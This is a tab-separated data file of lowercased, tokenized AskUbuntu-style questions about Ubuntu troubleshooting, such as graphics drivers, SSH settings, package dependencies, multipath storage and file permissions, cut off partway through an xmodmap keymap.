484604	load increasing to very high levels periodically	lately the load on my computer has been increasing significantly ( above 10 at times ) when i log in to gnome . the load decreases when i switch to one of the gui-less login options ( ctrl+atl+f1 sorry i do n't know the proper name for this ) back to a reasonable level . we are using networked home directories via nfs and likewise to manage home directories and logins between machines . this problem persists when i log in to any of our other machines , but it only occurs for myself and one other member of our group . also , when i log in via blackbox instead of gnome this does not occur as frequently , if at all . the machine that maintains our home directories also seems to increase in load as my machine does . edit : the load does appear to increase within blackbox as well and i 'm not able to get it to decrease via switching to the terminal . top shows no cpu processes running , but there is currently a load of 5.91 on my computer .
484606	dri_prime doesnt work	i have a hp g6-2251st ( 7420g+7670m ) . im following the procedure below to make my 7670m work but performance seems to stay same . here is what ive done ; xrandr -- listproviders providers : number : 3 provider 0 : id : 0x7c cap : 0x9 , source output , sink offload crtcs : 4 outputs : 3 associated providers : 2 name : radeon provider 1 : id : 0x45 cap : 0x6 , sink output , source offload crtcs : 6 outputs : 0 associated providers : 2 name : radeon provider 2 : id : 0x45 cap : 0x6 , sink output , source offload crtcs : 6 outputs : 0 associated providers : 2 name : radeon xrandr -- setprovideroffloadsink 1 0 dri_prime=1 steam steam : //rungameid/240
484607	how to get left taskbar like thing from ubuntu in lubuntu ?	sorry for not knowing the technical term for the taskbar in ubuntu . can i get that thing also in lubuntu ? i 'm talking about this thing below
484611	samba server does not authenticate windows xp client	hello everyone just yesterday i installed and configured samba server on a linux machine , my problem is that i can see my shares but when i try to access them from a windows machine it prompts me for a username and a password and when enter them the server does not accept them or something and the other thing is that i can access those share from another linux machine my problem is only with with windows machines any help please
484614	14.04 unity not working after reboot	earlier today i finished an apt-get upgrade and my machine reported that it needed to be rebooted . so i shut everything down and rebooted the box . the shutdown did n't go as smoothly as i would like and i ended up having to do a hard reset . but the machine then proceeded to come back up normally . i got the lightdm login screen with my background . when i attempted to login however strange things happened . initially nothing worked , i saw the background but that was it . from a different machine i was able to log in and tried rebooting again and when it came back up and i attempted to log in i got my background with nothing else . i 've been searching the internet for the last few hours trying to figure something out but to little avail . i have tried sudo service lightdm stop rm -f ~/.config/nux/dconf/ sudo reboot sudo apt-get install gnome-session-fallback logged in using the fallback gnome environment which works but most of my applications like adjusting background etc . do not . i also tried installing cinnamon but that has proved to be a no go as it crashes immediately upon logging in . the gnome-session-fallback has at least provided a destop environment i can work with . but now when i try to log into unity i get a black screen with nothing but a mouse pointer . which is semi functional ( i.e . it moves ) but that 's all . i 'm a little lost as to what to attempt next . i 'd like to go back to using unity if anyone can suggest a way to do that .
484615	how to add extra wallpapers to your desktop in ubuntu gnome	i have recently switched to gnome from unity and i just want to know how to add new background in it as it does'nt show the plus sign as shown in unity is there any other way to do it
484618	asus usb-n13 wireless adaptor losing connection	i have just purchased a new asus usb-n13 as it was recommended for use with ubuntu 14.04 . my connection is set up but closes around every 10 minutes , it then asks my for my wi-fi password again to log on `` it gets a bit frustrating after 10 times '' . anyone else had this problem or know a fix for it ? ?
484619	google contacts : browse by group , sync	running ubuntu 14.04 with gnome 3.12 with an added google account through online accounts , i automatically get incorporated calendar , email and contacts . alas , the contacts application is close to useless for handling my google contacts , as it shows all contacts . as google saves any email address one sends a mail to under other contacts , this includes some 2700 contacts in my case . but google also allows one to group contacts , which is how i keep them sorted on my phone and online . my question is : is there a desktop application/hack/fix that will allow me to show and sync my google contacts , based on their assigned groups ?
484624	how can i change power settings automatically while running vlc in xubuntu 14.04 64 bit	i am using xubuntu 14.04 64 bit . i usually play video using vlc media player . the problem i am having is , after 10 or 15 minutes computer turn off its display , even the video is running in the background . to get back video i have to move mouse or press any key in my laptop . in xubuntu default power settings i do not see any option where i can prevent computer to sleep if media player in my computer is running . is there a way to set priority so that computer do not sleep when the video is running . i attached current power setting of my computer .
484626	how do i recover ubuntu package manager from unmet dependencies errors	i have gotten the package manager into the following situation and have tried all `` automatic '' fixes but they did not resolve it . the following packages have unmet dependencies . kolab-libcyrus-imap-perl : conflicts : libcyrus-imap-perl conflicts : libcyrus-imap-perl22 libcameleon-ocaml-dev : depends : liblablgtk-extras-ocaml-dev-j5g92 depends : libxml-light-ocaml-dev-pwvb9 libclang-3.5-dev : depends : libstdc++-4.8-dev but it is not installable depends : libgcc-4.8-dev but it is not installable depends : libobjc-4.8-dev but it is not installable libclang-common-3.5-dev : depends : libllvm3.5 ( = 1:3.5~svn211056-1~exp1 ) but it is not going to be installed libclang1-3.5 : depends : libllvm3.5 but it is not going to be installed depends : libstdc++-4.8-dev but it is not installable depends : libgcc-4.8-dev but it is not installable depends : libobjc-4.8-dev but it is not installable libclang1-3.5-dbg : depends : libstdc++-4.8-dev but it is not installable depends : libgcc-4.8-dev but it is not installable depends : libobjc-4.8-dev but it is not installable libcloog-isl-dev : conflicts : libcloog-ppl-dev but 0.15.11-4 is to be installed libcloog-isl-dev-lts : conflicts : libcloog-isl-dev conflicts : libcloog-ppl-dev but 0.15.11-4 is to be installed libcloog-parma-dev : conflicts : libcloog-ppl-dev ( < 0.16 ) but 0.15.11-4 is to be installed libcunit1-ncurses : conflicts : libcunit1 but 2.1-0.dfsg-9build1 is to be installed libcunit1-ncurses-dev : conflicts : libcunit1-dev but 2.1-0.dfsg-9build1 is to be installed libcurl4-gnutls-dev : conflicts : libcurl-dev libcurl4-nss-dev : conflicts : libcurl-dev libcurl4-openssl-dev : conflicts : libcurl-dev e : unable to correct problems , you have held broken packages . i have an ubuntu 12.04 , 64 bit system . i am trying to install clang to build for 32 bit . 32 bit libc++ is the part that is not installed at the moment and which i am trying to install . edit : if i try to remove the packages and their dependencies , it says they are all not installed . i do not need most of them .
484628	changed permitrootlogin to no , but i can still login as root	i just created a new server ( vm ) and i setup ssh , i can login fine . i created another user account , added it to the admin group and sudo works fine . now i want tried to disable the root login , so i edited the /etc/ssh/ssh_conf file with : host * passwordauthentication no permitrootlogin no sendenv lang lc_* hashknownhosts yes gssapiauthentication yes gssapidelegatecredentials no ( the above lines are all the lines that are commented out ) . note : it did n't have permitrootlogin so i added it myself manually . i am running ubuntu 14.04 i can still login using my non-root account , and i can also login with my root login ( it asks for the password and then works fine ) . i did restart the ssh service , and i also restarted the entire vm just in case . what could the issue be here ?
484629	installing plperl in postgresql	i am trying to use the perl language in postgresql , thus i need to install plperl . i am running all of my queries in pgadmin iii . when i first tried create extension plperl ; i get the following error : could not open extension control file `` /usr/share/postgresql/9.2/extension/plperl.control '' : no such file or directory . sql state : 58p01 so i tried to install plperl by using the following command in my terminal : sudo apt-get install postgresql-plperl-9.2 which created a plperl.control file in the folder ~/9.2/extension/ . i ran the create extension again but still received the same error . i then did a clean uninstall of postgresql and pgadmin iii and did a fresh install , but still receive the same error . i am out of ideas on what else i can do . any ideas ?
484630	12.04 laptop screen showing blue and white - no gui on external monitor	please forgive my ignorance on a number of your potential answers as i 'm new to linux . basically i turned my laptop on one day a while back and was greeted with a black screen . i 've since spent a number of weeks trying to fix the problem using these forums but have got myself into a mess . i get a blue and white screen which i can do nothing with . if i connect an external monitor i get a non gui login but it 's quite difficult to read the text . i 've tried so many things that i 've lost track . i have an acer aspire 5630 with a nvidia geforce go 7300 . ubuntu 12.04.4 lts is installed and the latest kernel is 3.11.0.23 . i can get to the gui on the external monitor using a previous version from the grub menu . thanks in advance for your help . steve
484633	no audio sound fusion cs46xx cirrus logic cs4297a rev 4 how to make sure my sound card is defined , i have no sound	i have soundfusion sound card , installed on pci card on my desktop , output from lspci is below , the sound card came with windows driver which is working fine , but my ubuntu 12.10 sound is not working . also alsamixer is not muted and everything is defined correctly there . there is no sound coming out , can anyone help me to define the driver from scratch , step by step , i 'm new to ubuntu . output from lspci is below : 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) 00:02.0 vga compatible controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 03:04.0 multimedia audio controller : cirrus logic cs 4614/22/24/30 [ crystalclear soundfusion audio accelerator ] ( rev 01 ) alsamixer output : card : sound fusion cs46xx f1 : help │ │ chip : cirrus logic cs4297a rev 4 f2 : system information │ │ view : f3 : [ playback ] f4 : capture f5 : all f6 : select sound card │ │ item : master [ db gain : -6.00 , -6.00 ] esc : exit │ │ │ │ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │▒▒│ │ │ │▒▒│ │ │ │ │ │ │ │ │ │ │ │ │ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │ │ ├──┤ ├──┤ ├──┤ └──┘ └──┘ ┌──┐ ├──┤ ├──┤ ├──┤ ├──┤ │ │ │oo│ │oo│ │oo│ │oo│ │oo│ │oo│ │oo│ │oo│ │ │ └──┘ └──┘ └──┘ └──┘ └──┘ └──┘ └──┘ └──┘ │ │ 79 < > 79 81 81 < > 81 80 73 93 < > 93 100 < > 100 81 < > 81 100 │ │ < master > master m headphon 3d contr 3d contr 3d contr pcm line cd mic │ └───────────────────────────────────────────────────────────────────────────────────────────────┘ thanks ; leo
484636	ubuntu on my galaxy nexus	i get an error when trying to install ubuntu on my galaxynexus maguro . everything is downloaded fine but when it 's time to flash it , i got this error : `` ca n't flash recovery image '' . i 've tried to find a similar case online without any luck ... did i miss something ?
484638	graphics card issue- black screen after login , nomodeset works with live cd , not on install	thanks in advance for any help , scratching my head on this one . system info : dell d810 bios a05 pentium m 1.73ghz not hyperthread capable ( thinking that may be an issue ) 1024 mb ram video ati mobility radeon x300 video bios 001.001.008.017.192.059 video memory 64 mb 15.4 '' wide vga native resolution 1280 by 800 bodhi linux 3.8.0 generic so as i said , when running the no mode set through the live usb all is good , able to run the system and preform the install . after not having any luck getting past the login screen , i rebooted to the live cd and ran boot-repair . after that i was able to get into grub and add the nomodeset param , no luck . rebooted again , logged in via terminal at login screen ( ctrl+alt+f1 ) then ran sudo nano /etc/default/grub grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor= '' bodhi linux '' grub_cmdline_linux_default= '' nomodeset '' grub_cmdline_linux= '' '' not sure what i 'm missing , i 've used this same setup on dell e5400 perfectly . if i need to provide any other info , please let me know and i 'll get it asap . thanks !
484640	how to mount usb 3.5 inch floppy drive and read ms dos disk	i am running ubuntu 14.04 64 bit . when i plug in my usb floppy drive ubuntu tries to automount the drive and i get the same error message if there is a disk in the drive or not . the usb floppy drive works on another laptop that is running windows 7 . `` error mounting /dev/sdb at /media/dave/disk : command-line `mount -t `` auto '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdb '' `` /media/dave/disk '' ' exited with non-zero exit status 32 : mount : no medium found on /dev/sdb '' i am not sure how to go about troubleshooting this one . -- dave
484641	no login possible with postfix/dovecot and mysql under imap	i did the following installation of my own mailserver with dovecot/postfix and mysql : https : //thomas-leister.de/internet/mailserver-ubuntu-server-dovecot-postfix-mysql/ if you see the section of setting up the mysql server , my first question is if my settings are okay . i 've got three tables in my database vmail called aliases , domains and users . into domains i set up my domain address which links to my server ( e.g . mho.de ) . in aliases i set up which mail should be forwarded to another mail address and in users i set up user containing information about username , domain and the corresponding password . now if i want to setup an email account in a mail client , i get the following on the server and the client ca n't connect to the server : jun 17 17:48:47 vserver dovecot : imap-login : disconnected ( no auth attempts in 0 secs ) : user= < > , rip=from_ip , lip=dest_ip , tls : disconnected , session= < 8mbxfar87qdvkvrr >
484653	multipath configuration help with ibm 1746 san ( ds3500 )	host : ibm x3850 fc-hba : qlogic qle2562 , dualport das-storage : ibm ds3500 dual-controller , 1 port per controller connected after setting up a new install of 14.04 and configuring devices , i get device errors during boot for every device and every port of ds3500 : see log below . i tried to change host operating system in ds3500 from mpp/rdac to lnxalua . the error messages went away but mutlipath -ll shows that rdac is used . after adjusting multipath.conf to use alua getting error : multipathd : a dynamic linking error occurred : /lib/multipath/libcheckalua.so : can not open > shared object file : no such file or directory ) could not resolve âś . back on mpp/rdac multipath -ll shows nothing and syslog shows errors like below logs on bottom . multipath does not work by now ... any advise would be appreciated ! logs : 15.331957 ] qla2xxx [ 0000:86:00.0 ] -00fb:3 : qlogic qle2562 - qlogic 8gb fc dual-port hba for system x . 15.372195 ] qla2xxx [ 0000:86:00.0 ] -00fc:3 : isp2532 : pcie ( 5.0gt/s x8 ) @ 0000:86:00.0 hdma+ host # =3 fw=7.01.00 ( 90d5 ) . 15.414007 ] qla2xxx [ 0000:86:00.1 ] -001d : : found an isp2532 irq 64 iobase 0xffffc90072cd0000 . 15.456150 ] qla2xxx 0000:86:00.1 : irq 113 for msi/msi-x 15.456181 ] qla2xxx 0000:86:00.1 : irq 114 for msi/msi-x 17.665675 ] qla2xxx [ 0000:86:00.0 ] -505f:3 : link is operational ( 8 gbps ) . 18.030629 ] qla2xxx [ 0000:86:00.0 ] -1020:3 : **** failed mbx [ 0 ] =4006 , mb [ 1 ] =7fe , mb [ 2 ] =1 , mb [ 3 ] =4 , cmd=6a **** . 18.072622 ] scsi 3:0:0:0 : direct-access ibm universal xport 1070 pq : 0 ansi : 5 18.117509 ] scsi 3:0:0:1 : direct-access ibm 1746 fastt 1070 pq : 0 ansi : 5 18.160602 ] scsi 3:0:0:0 : attached scsi generic sg2 type 0 18.204151 ] sd 3:0:0:1 : attached scsi generic sg3 type 0 18.205012 ] sd 3:0:0:1 : [ sdb ] 1048576000 512-byte logical blocks : ( 536 gb/500 gib ) 18.206125 ] sd 3:0:0:1 : [ sdb ] write protect is off 18.206128 ] sd 3:0:0:1 : [ sdb ] mode sense : 83 00 10 08 18.206498 ] sd 3:0:0:1 : [ sdb ] write cache : enabled , read cache : enabled , supports dpo and fua 18.338163 ] scsi4 : qla2xxx 18.347073 ] qla2xxx [ 0000:86:00.1 ] -00fb:4 : qlogic qle2562 - qlogic 8gb fc dual-port hba for system x . 18.347078 ] qla2xxx [ 0000:86:00.1 ] -00fc:4 : isp2532 : pcie ( 5.0gt/s x8 ) @ 0000:86:00.1 hdma+ host # =4 fw=7.01.00 ( 90d5 ) . 18.347571 ] qla2xxx [ 0000:95:00.0 ] -001d : : found an isp2532 irq 56 iobase 0xffffc90072cde000 . 18.348125 ] qla2xxx 0000:95:00.0 : irq 115 for msi/msi-x 18.348141 ] qla2xxx 0000:95:00.0 : irq 116 for msi/msi-x 18.713762 ] sd 3:0:0:1 : [ sdb ] 18.758261 ] result : hostbyte=did_ok driverbyte=driver_sense 18.802896 ] sd 3:0:0:1 : [ sdb ] 18.845334 ] sense key : illegal request [ current ] 18.888324 ] sd 3:0:0:1 : [ sdb ] 18.927702 ] < < vendor > > asc=0x94 ascq=0x1asc=0x94 ascq=0x1 18.969035 ] sd 3:0:0:1 : [ sdb ] cdb : 19.009541 ] read ( 10 ) : 28 00 00 00 00 00 00 00 08 00 19.050279 ] end_request : i/o error , dev sdb , sector 0 19.089456 ] buffer i/o error on device sdb , logical block 0 19.630029 ] sd 3:0:0:1 : [ sdb ] 19.666857 ] result : hostbyte=did_ok driverbyte=driver_sense ... 64.504856 ] sd 3:0:0:1 : rdac : lun 1 ( rdac ) ( unowned ) 64.505737 ] sd 5:0:0:1 : rdac : lun 1 ( rdac ) ( owned ) 64.505742 ] rdac : device handler registered 64.548834 ] device-mapper : multipath round-robin : version 1.0.0 loaded 64.555789 ] device-mapper : table : 252:0 : multipath : error getting device 64.556196 ] sd 3:0:0:1 : [ sdb ] 64.556198 ] result : hostbyte=did_ok driverbyte=driver_sense 64.556200 ] sd 3:0:0:1 : [ sdb ] 64.556202 ] sense key : illegal request [ current ] 64.556203 ] sd 3:0:0:1 : [ sdb ] 64.556211 ] < < vendor > > asc=0x94 ascq=0x1asc=0x94 ascq=0x1 64.556213 ] sd 3:0:0:1 : [ sdb ] cdb : 64.556217 ] read ( 10 ) : 28 00 3e 7f ff f0 00 00 08 00 64.556219 ] end_request : i/o error , dev sdb , sector 1048575984 64.556221 ] buffer i/o error on device sdb , logical block 131071998 64.740877 ] device-mapper : ioctl : error adding target to table 64.751583 ] device-mapper : table : 252:0 : multipath : error getting device 64.811318 ] device-mapper : ioctl : error adding target to table 64.836536 ] device-mapper : table : 252:0 : multipath : error getting device 64.898305 ] device-mapper : ioctl : error adding target to table 64.910448 ] device-mapper : table : 252:0 : multipath : error getting device 64.968345 ] device-mapper : ioctl : error adding target to table 64.985344 ] device-mapper : table : 252:0 : multipath : error getting device 65.045745 ] device-mapper : ioctl : error adding target to table 65.065624 ] device-mapper : table : 252:0 : multipath : error getting device 65.121701 ] device-mapper : ioctl : error adding target to table 65.145184 ] device-mapper : table : 252:0 : multipath : error getting device 65.202583 ] device-mapper : ioctl : error adding target to table 65.223581 ] device-mapper : table : 252:0 : multipath : error getting device 65.281298 ] device-mapper : ioctl : error adding target to table 65.295510 ] device-mapper : table : 252:0 : multipath : error getting device 65.354897 ] device-mapper : ioctl : error adding target to table 65.372987 ] device-mapper : table : 252:0 : multipath : error getting device 65.427124 ] device-mapper : ioctl : error adding target to table
484654	problem with netbeans 7.0.1 on ubuntu 14.04	i was working in win7 , and i just got sick of windows . so i installed 14.04 lts and netbeans today . opened it and start new project , several times . wo n't create new project , wo n't do nothing . at one point , the app had to be killed . so , i 'm totally new to ubuntu and linux and need help . i could n't find answer that could save my problem .
484656	is radeon dynamic power management enabled by default by now ?	i keep reading that it is , that it is n't . that it was supposed to be enabled by default in the linux kernel version 3.13 or 3.14 , or in ubuntu 14.04 . or do you still have to follow these steps to enable it ? i 'm considering upgrading from ubuntu 12.04 to 14.04 just for this feature . it 's just hard to find a straight answer online .
484661	fglrx always hard-crashes my hybrid-gpu laptop . how can i disable radeon and use only i915 ?	my computer only seems to boot when i have radeon.modeset=0 . xorg still loads the radeon drivers , which causes it to use llvmpipe for opengl rendering , which in turn makes my cpu fans sound like they 're launching into space . how can i force xorg to load i915 ? update ( 6/19/2014 ) : i tried the instructions posted here , but it did n't seem to change anything . i had already purged fglrx before . here 's my xorg log : http : //sprunge.us/qrti . you can see that while it fails to load fglrx , it still loads radeon . and it still is using llvmpipe : $ glxinfo | grep `` opengl renderer opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 256 bits )
484663	user interface selector between unity and gnome ?	simple ( and possibly stupid ) question that i have not found a clear answer to : is it possible to have both unity and gnome installed and select which ui to use on login ? is the gnome ui the only change in the `` ubuntu gnome '' build ?
484668	how can i empty trash in ubuntu 14.04 ? ( it stopped working after upgrade from 13.10 )	i right click on app and it switches to `` empty trash '' but then prepares and times out ... i go into trash and click on the empty icon but the same thing happens ... i try to shift delete all or just one item and it still does not work !
484670	can i get unity web player in ubuntu gnome	currently i am using ubuntu gnome 14.04 and i want to the way to install unity web player as many applications online needs that plugin to be installed in order to display some graphics or games . i also have wine installed in my pc so can i download a windows version of it and use it for gnome environment
484673	waking up from hibernation causes an immediate restart	since i updated my system , i have an unusual problem - hibernation works normally , but waking up from it ( almost always ) results in a restart as soon as the system finishes booting . what could be the problem ? i 'm not familiar with these kind of issues so please tell me exactly which log files/other information can i provide to help solve this pesky problem . thanks in advance .
484675	juniper junos pulse vpn	my employer upgraded their vpn server , so now my old ubuntu vpn client no longer works . i upgraded to a later version ( version : 7.3r3 ) , and put nc.jar on my path . now when i try launch the vpn , i get the following : obviously it lacks sudo permissions to update /etc/hosts . is there a way to configure it such that the vpn process ( a java applet ) runs with sudo permissions . i know , as i wrote that sentence , i cringed , but hey ...
484676	ubuntu 14.04 software center and updater do n't open	my software center crashes immediately after opening , and my update center will not open at all . i have tried updating from the terminal , but i receive , n : ignoring file 'play ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension e : type ' will someone please provide help in plain english . this happened after installing itunes10 using playonlinux . thank you .
484677	why is my pc showing hidden files even after renaming files starting with a dot	my pc shows hidden files even after renaming the file with a name which starts with a dot is there any solution for this .
484679	wifi not working on ubuntu 14.04	i have installed 14.04 . after installing my wifi was not working , so i went to software & updates and in additional drivers i selected broadcomm driver my wifi worked for a week . then now again it is not working . here is an image of additional drivers
484681	how do i choose among the tab directory completor in terminal ?	i type in for example : cp /media/macintosh then tab so that it can correctly put in the formatting for macintosh hd i then want it to complete among a few options if you press tab.. for this example there is desktop and desktop ( old ) how do i choose desktop ( old ) when i type de tab tab it shows up there as a list of options but then i do n't know how to choose the second option on the list . i need the correct formatting for the directory `` /desktop ( old ) / '' and i can use tab to have it do that but i do n't know how . now i have a new problem : i am doing a data recovery for someone : -ubuntu : ~ # cp /media/macintosh\ hd/users/orlandocampoverde/desktop\ \ ( original\ ) /videos\ espanol/ /media/\ $ g\ $ \ data/orlando/desktop/ cp : omitting directory `/media/macintosh hd/users/orlandocampoverde/desktop ( original ) /videos espanol/' when i typed that this was my response : -ubuntu : ~ # cp /media/macintosh\ hd/users/orlandocampoverde/desktop\ \ ( original\ ) /videos\ espanol/ /media/\ $ g\ $ \ data/orlando/desktop/ cp : omitting directory `/media/macintosh hd/users/orlandocampoverde/desktop ( original ) /videos espanol/' by the way i am logged in as root . what does this mean and how do i fix it ?
484682	how to hide files using ubuntu gnome	does renaming file with a name which starts with a dot hides files in ubuntu gnome . i have done the same but whenever i restart nautilus the hidden files reappear is this a bug
484688	why ubuntu distribution ?	why other distributions such as mint , elementary , ... wait always ubuntu to release , so they could release their own distributions ?
484695	how to install stack applet ?	i am trying to install stack applet . i followed the instructions in this question . to be specific i used the following sudo add-apt-repository ppa : george-edison55/george-edison sudo apt-get update sudo apt-get upgrade sudo apt-get install stackapplet python /usr/share/stackapplet/stackapplet.py & when i start stack applet via the dash , nothing happens . ( i.e . no window opens . ) i tried restarting my computer and starting stack applet but that also did not work . how do i install stack applet ? edit : i tried using ubuntu software center with no luck . my interface looks like so
484696	is there any app like lanoptimiser for ubuntu	many pcs come with preinstalled windows which has an application called lan optimiser which optimises lan . is any application similar to that available in ubuntu ?
484697	is enabling upnp in transmission worth the security risk ?	i 'm wondering if enabling upnp so that transmission can select a random port on start worth the security risk . i am not asking if having a listening port is worth the risk but instead is it worth the risk to having a changing port using upnp instead of a fixed port . is it worth the security risk to enable upnp so that transmission can select a random port ?
484698	how to get expandable list items back in nautilus ?	if i remember correctly , nautilus would let me expand folders when they where in a listview . it used to have little triangles which you could click to expand the contents of that folder : kind of like how it is on mac osx as well : but with the current version of nautilus in 14.04 , i do n't see that option anymore . does anybody know how i can get it back ? all tips are welcome !
484700	recover files for dual boot hd / files should be good , mb went bad	i have ( had ) a dual boot ubuntu / win 7 laptop . the motherboard on the laptop died and the hard drive still seems good . i want to plug the hd into another ubuntu machine and recover both the windows and ubuntu files . my first attempt failed . i connected up the hardware through a usb port and the ubuntu machine did not automatically recognize the drive . i suspect that it is more complex than i first thought . how do i mount an external usb drive that was previously used as a dual boot drive ?
484705	widows 8 bcd missing with ubuntu dual boot	i had just installed ubuntu in legacy mode with windows 8 . i installed ubuntu to a ssd and the windows os is on my hdd . i was able to use both ubuntu and windows all day until i force shutdown my laptop when a game caused it to lag . now when booting windows the bcd is missing information with an error code : 0xc0000034 . i use grub and the ubuntu os is working perfectly . i can not even mount the windows drive in ubuntu and i get this error : error mounting /dev/sdb5 at /media/mukhil/windows8_os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb5 '' `` /media/mukhil/windows8_os '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
484706	copy a file in computer folder	i try to load the dictionary es-es.dic in the folder usr\share\myspell\dicts ( needed for texmaker ) but i am not permited because i am not `` owner '' how can i solve this ?
484707	what does `` omitting directory '' mean and how do i make it cp the directory rather than omit it	i am doing a data recovery for someone and enter the following command -ubuntu : ~ # cp /media/macintosh\ hd/users/orlandocampoverde/desktop\ ( original ) /videos\ espanol/ /media/\ $ g\ $ \ data/orlando/desktop/ and it outputted this , cp : omitting directory `/media/macintosh hd/users/orlandocampoverde/desktop ( original ) /videos espanol/' by the way , i am logged in as root . what does this mean and how do i fix it ?
484714	how to add an account to stack applet	i have recently installed stack applet and i want to add my account in to it . however , i ca n't do so as i am unable to select a site properly . see this screen shot . when i press on the option site nothing appears . instead , a blank dock appears displaying nothing on . clicking it the dock disappears .
484715	i have this executable ( application/x-executable ) but it is not executing when i click on it	i have the execoin wallet executable file . i have tried opening it with lots of programs but nothing seems to happen . i am a newbie to linux , do n't know how to do much . if you do answer , can it be fully explained ? i just need to know how to execute the file as it does n't seem to work . sorry i did what you said about making it an executable before i opened the forum . i am sorry i didnt give enough information : the file is a executable ( application/x-executable ) ( copied from the properties section of the file ) i am wondering if there is a setting wrong in my system and not the file ? sorry that i didnt reply sooner . thank you in advance
484717	adapter for sega genesis gamepads to usb in xubuntu	i have xubuntu 14.04 and i wanted to do some retro gaming with emulators such as dgen . i have some sega genesis gamepads lying around . will something like a genesis to pc usb cable permit me to use them in my ubuntu machine ?
484718	how to make a file executable ?	how can i make my file so that i can double click on it , and it runs . it is a .sh script , but i also have files that say : executable ( application/x-executable ) in the description of what they are . i ca n't run any of these from terminal , or by double clicking . if possible , i would like a way using either the gui or a terminal , but not a combination of the two . here is a screenshot of what i see when i right click then go on properties . the file first : and the shell script here : nb : i accept that this is a duplicate ( i was looking for it , and could n't find it , so asked + answered it , hoping that i would find it ) however , i do n't think the question about .desktop files is a duplicate .
484723	using xmodmap , my shift lock now acts as both a shift lock and a compose key . i just want it to work as a compose key . what can i do ?	i have two xmodmap files . first one : keycode 8 = keycode 9 = escape nosymbol escape keycode 10 = ampersand 1 ampersand 1 bar exclamdown bar keycode 11 = eacute 2 eacute 2 at oneeighth at keycode 12 = quotedbl 3 quotedbl 3 numbersign sterling numbersign keycode 13 = apostrophe 4 apostrophe 4 onequarter dollar onequarter keycode 14 = parenleft 5 parenleft 5 onehalf threeeighths onehalf keycode 15 = section 6 section 6 asciicircum fiveeighths asciicircum keycode 16 = egrave 7 egrave 7 braceleft seveneighths braceleft keycode 17 = exclam 8 exclam 8 bracketleft trademark bracketleft keycode 18 = ccedilla 9 ccedilla 9 braceleft plusminus braceleft keycode 19 = agrave 0 agrave 0 braceright degree braceright keycode 20 = parenright degree parenright degree backslash questiondown backslash keycode 21 = minus underscore minus underscore dead_cedilla dead_ogonek dead_cedilla keycode 22 = backspace backspace backspace backspace keycode 23 = tab iso_left_tab tab iso_left_tab keycode 24 = a a a a at greek_omega at keycode 25 = z z z z lstroke lstroke lstroke keycode 26 = e e e e eurosign cent eurosign keycode 27 = r r r r paragraph registered paragraph keycode 28 = t t t t tslash tslash tslash keycode 29 = y y y y leftarrow yen leftarrow keycode 30 = u u u u downarrow uparrow downarrow keycode 31 = i i i i rightarrow idotless rightarrow keycode 32 = o o o o oe oe oe keycode 33 = p p p p thorn thorn thorn keycode 34 = dead_circumflex dead_diaeresis dead_circumflex dead_diaeresis bracketleft dead_abovering bracketleft keycode 35 = dollar asterisk dollar asterisk bracketright dead_macron bracketright keycode 36 = return nosymbol return keycode 37 = control_l nosymbol control_l keycode 38 = q q q q ae ae ae keycode 39 = s s s s ssharp section ssharp keycode 40 = d d d d eth eth eth keycode 41 = f f f f dstroke 